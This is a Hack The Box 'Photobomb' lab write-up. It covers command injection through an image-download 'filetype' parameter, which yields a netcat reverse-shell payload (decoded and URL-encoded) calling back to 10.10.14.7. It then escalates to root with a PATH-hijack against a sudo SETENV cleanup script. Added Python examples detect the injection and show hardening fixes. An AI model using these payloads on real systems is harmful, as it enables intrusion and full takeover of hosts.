[Hack The Box] Photobomb Writeup


💡 This is a writeup of the Hack The Box machine Photobomb.

Problem


Enumeration

┌──(root㉿kali)-[/home/kali/Desktop]
└─ nmap -sV -p - -vv --min-rate 3000 10.129.228.60
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-19 03:09 EST
Discovered open port 22/tcp on 10.129.228.60
Discovered open port 80/tcp on 10.129.228.60
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 42.79 seconds
           Raw packets sent: 86968 (3.827MB) | Rcvd: 80330 (3.213MB)


HTTP

Let's look at the source code.

Looking at the photobomb.js script file, the ID and password can be found.

The site has a feature for downloading images.

To tamper with the parameters sent to the server when an image is downloaded, we capture the request with Burp Suite.

The file name (photo), the extension (filetype, e.g. jpg) and the resolution (dimensions) are all taken from user input.

Because the download feature converts the image to the requested extension, we check whether it is vulnerable to a file download attack or to OS command injection.

The filetype parameter is vulnerable to OS command injection.

Setting the filetype value as follows yields a reverse shell (the first line is the decoded command, the second is the URL-encoded form sent in the request body):

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 1234 >/tmp/f
filetype=jpg;rm+%2ftmp%2ff%3bmkfifo+%2ftmp%2ff%3bcat+%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.14.7+1234+%3e%2ftmp%2ff
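As an added example (not the box's server code, which the writeup does not show), the following Python contrasts the injectable pattern, user input interpolated into a single shell string, with a hardened version that allowlists each parameter and passes an argv list to the process without a shell. It also decodes a request body built from the payload quoted above and flags the parameter that carries shell metacharacters, which is the check a WAF rule or a log review would apply. The ImageMagick convert command line, the photo name and the dimensions are assumptions.

```python
"""Added example (not the Photobomb server code): why the filetype parameter was
injectable, how a defender spots the injected value, and how the back end should
have built the command. Assumed: the back end shells out to ImageMagick 'convert'."""
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed request body: photo and dimensions are placeholders, the filetype
# value is the URL-encoded payload quoted in the writeup above.
REQUEST_BODY = (
    "photo=example_photo.jpg"
    "&filetype=jpg;rm+%2ftmp%2ff%3bmkfifo+%2ftmp%2ff%3bcat+%2ftmp%2ff%7c%2fbin%2fsh"
    "+-i+2%3e%261%7cnc+10.10.14.7+1234+%3e%2ftmp%2ff"
    "&dimensions=300x200"
)

SHELL_META = re.compile(r"[;&|`$<>\n(){}]")      # characters a shell interprets
ALLOWED_FILETYPES = {"jpg", "png"}                # strict allowlist, not a denylist
PHOTO_RE = re.compile(r"^[A-Za-z0-9_-]+\.jpg$")  # no '/', no '..', no spaces
DIMENSIONS_RE = re.compile(r"^\d{1,4}x\d{1,4}$")


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body by hand, so the result
    does not depend on whether this Python's parse_qs also splits on ';'."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def flag_suspicious_params(body):
    """Detection: names of parameters whose decoded value contains shell metacharacters."""
    return [name for name, value in parse_body(body).items() if SHELL_META.search(value)]


def build_vulnerable_command(photo, filetype, dimensions):
    """The injectable pattern: user input interpolated into one shell string.
    Run with shell=True, every ';' and '|' inside filetype starts a new command."""
    return f"convert source_images/{photo} -resize {dimensions} /tmp/out.{filetype}"


def build_safe_argv(photo, filetype, dimensions):
    """Hardened form: validate every field against an allowlist or strict pattern,
    then return an argv list; each element reaches convert as one literal argument."""
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError(f"filetype not allowed: {filetype!r}")
    if not PHOTO_RE.fullmatch(photo):
        raise ValueError(f"bad photo name: {photo!r}")
    if not DIMENSIONS_RE.fullmatch(dimensions):
        raise ValueError(f"bad dimensions: {dimensions!r}")
    return ["convert", f"source_images/{photo}", "-resize", dimensions, f"/tmp/out.{filetype}"]


def convert_safely(photo, filetype, dimensions):
    """Run the conversion with shell=False: no shell parses the arguments at all."""
    return subprocess.run(build_safe_argv(photo, filetype, dimensions), shell=False, check=True)


if __name__ == "__main__":
    params = parse_body(REQUEST_BODY)
    print("parameters carrying shell metacharacters:", flag_suspicious_params(REQUEST_BODY))
    try:
        build_safe_argv(**params)
    except ValueError as err:
        print("hardened builder rejected the request:", err)
```

The allowlist is the important half: quoting the value with shlex.quote would also stop this payload, but a fixed set of extensions and an argv list leave no shell to confuse in the first place.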


Privilege Escalation


(root) : the command may be run as root
SETENV : environment variables may be set on the sudo command line
NOPASSWD : the account's password is not required when running sudo
/opt/cleanup.sh : this file may be executed with sudo

Let's examine the /opt/cleanup.sh file.

wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

This shell script runs as root. Since SETENV lets us change environment variables, we manipulate PATH so that find, which the script invokes without an absolute path, resolves to our own file that launches bash, which gives us root.

cd /tmp
echo "bash" > find
chmod 777 find
sudo -u root PATH=/tmp:$PATH /opt/cleanup.sh
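An added example, not part of the writeup: a small audit in Python that reads the cleanup script quoted above and lists every command the shell (or find's -exec) will resolve through PATH, plus a check of a PATH value for entries outside the usual root-owned directories. It shows why find (and the chown it spawns) is the weak spot while /bin/cat and /usr/bin/truncate are not, and what sudo's secure_path, or an explicit PATH= line at the top of a script run via sudo, protects against. The script text is copied from the page; the trusted directory list and the sample PATH are assumptions.

```python
"""Added example (not code from the writeup or the box): find the commands in a
script run by sudo that are looked up through PATH, and check a PATH value for
untrusted entries. Both conditions together are what the SETENV + relative
'find' combination above depends on."""
import re
import shlex

# The /opt/cleanup.sh script exactly as printed in the writeup above.
CLEANUP_SH = r"""#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
"""

# Shell keywords: the real command word follows them on the same line.
KEYWORDS = {"if", "then", "else", "elif", "fi", "do", "done", "while", "until",
            "!", "{", "}", "time"}
# Builtins never consult PATH; once seen, the rest of the segment belongs to them.
BUILTINS = {"[", "[[", "test", "cd", "export", "source", ".", "exit", "return",
            "set", "unset", "echo", "shift", "read", "local", "for", "case",
            "true", "false"}
# Split on list/pipe operators, but not on an escaped ';' such as find's '\;'.
SEGMENT_RE = re.compile(r"(?<!\\)(?:\|\||&&|[;|&])")
# GNU find hands the word after these to execvp, so it is PATH-resolved as well.
FIND_EXEC = {"-exec", "-execdir", "-ok", "-okdir"}


def path_resolved_commands(script):
    """Return the command names in `script` that the shell (or find -exec) will
    look up through PATH, i.e. those written without a '/' in the name.
    Parsing is deliberately simple: a '#' inside quotes would be taken as a comment."""
    found = []

    def note(word):
        if "/" not in word and word not in found:
            found.append(word)

    for raw in script.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and the shebang
        if not line:
            continue
        for segment in SEGMENT_RE.split(line):
            try:
                words = shlex.split(segment)
            except ValueError:                   # unbalanced quote: crude fallback
                words = segment.split()
            for i, word in enumerate(words):
                if word in KEYWORDS or ("=" in word and not word.startswith("=")):
                    continue                      # keyword or VAR=value prefix
                if word in BUILTINS:
                    break
                note(word)                        # the command word itself ...
                for j in range(i + 1, len(words) - 1):
                    if words[j] in FIND_EXEC:    # ... and any find -exec target
                        note(words[j + 1])
                break
    return found


def untrusted_path_entries(path, trusted=("/usr/local/sbin", "/usr/local/bin",
                                          "/usr/sbin", "/usr/bin", "/sbin", "/bin")):
    """Entries of a PATH value outside the usual root-owned directories (the same
    idea as sudo's secure_path). Empty and relative entries are reported too."""
    return [entry for entry in path.split(":") if entry not in trusted]


if __name__ == "__main__":
    print("PATH-resolved commands in cleanup.sh:", path_resolved_commands(CLEANUP_SH))
    # Constructed PATH value of the kind the escalation above injects.
    print("untrusted PATH entries:", untrusted_path_entries("/tmp:/usr/bin:/bin"))
```

Two fixes follow directly from the output: drop SETENV from the sudoers rule (or rely on secure_path, which sudo applies by default on Ubuntu unless the rule allows the caller to override it), and write /usr/bin/find and /bin/chown in the script so that no command in it depends on PATH at all.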

